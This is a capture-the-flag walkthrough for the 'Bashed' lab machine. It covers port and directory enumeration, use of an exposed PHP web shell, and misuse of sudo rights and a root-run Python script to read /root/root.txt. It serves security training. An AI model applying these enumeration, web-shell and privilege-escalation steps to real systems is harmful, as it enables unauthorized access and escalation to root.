- Do some simple HTTP enumeration to find a custom php script
- Use the phpbash.php script grab user and root flag
First I start with an nmap scan
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-16 15:48 EDT Nmap scan report for 10.10.10.68 Host is up (0.053s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.28 seconds
Only one port this time. Navigating to the webpage I see a nice custom webpage. A quick look aorund does reveal anything obvious
Running a gobuster reveals some directories.
/images (Status: 301) /uploads (Status: 301) /php (Status: 301) /css (Status: 301) /dev (Status: 301) /js (Status: 301) /config.php (Status: 200) /fonts (Status: 301)
Quite a few options but the one that is interesting to us is the /dev directory. Navigating to the directory I will see two files. phpbash.min.php and phpbash.php
Doesnt matter which file you choose, both of them give you a custom bash shell written in php.
At this point you can grab the user flag located in /user/arrexel.
Now time to get the root flag. Running a quick sudo -l I see that the I can run sudo asa the user scriptmanager.
www-data@bashed :/var/www/html/dev# sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
Doing some basic enumeration around the box I noticed a strange directory name /scripts which is not there by default. A quick permissions check reveals that the directory is indeed owned by the user scriptmanager. Currently as the user www-data I can see there are two files in there but I are unable to read them. This is where I will use scriptmanagers sudo priviledges
www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.py f = open("test.txt", "w") f.write("testing 123!") f.close www-data@bashed:/# sudo -u scriptmanager cat /scripts/test.txt testing 123!
Looking at both the files I can come to the conclusion that there is probably a process executing test.py and sending the output to test.txt.
What I are going to do is edit the test.py script to copy the contents of the root.txt file into the test.txt so I can then read it. This can be achieved with the short script below
f = open("test.txt", "w") r = open("/root/root.txt", "r") re = r.readline() f.write(re)
Now I wait for the new file to execute and if you did everything correctly than you should be able to get the root flag by reading the /scripts/test.txt file.